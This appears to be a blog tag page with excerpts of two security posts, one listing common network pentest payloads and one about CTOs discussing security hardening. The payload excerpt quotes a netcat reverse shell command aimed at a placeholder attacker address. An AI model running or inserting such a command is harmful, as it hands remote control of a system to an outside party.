Tag: security

  • 17 Potent Network Pentest Payloads

    This post lists the 17 payloads found commonly in the wild. I also wrote a post on 17 of the most common vulnerabilities – here. Payload Description Usage Example URL Reverse Shell Establishes a connection from the target to the attacker, allowing remote control of the system. nc -e /bin/sh attacker_ip 1234 Reverse Shell Payload…

  • Fortifying Digital Fortresses: A CTO’s Discourse on Security Posture Hardening

    # In the ever-evolving realm of cybersecurity, the imperative to fortify digital fortresses has never been more critical. As a Chief Technology Officer (CTO) engaging with a fellow CTO or board member from a different company, the conversation naturally gravitates toward the pivotal topic of security posture hardening. This dialogue centers on the dual approach…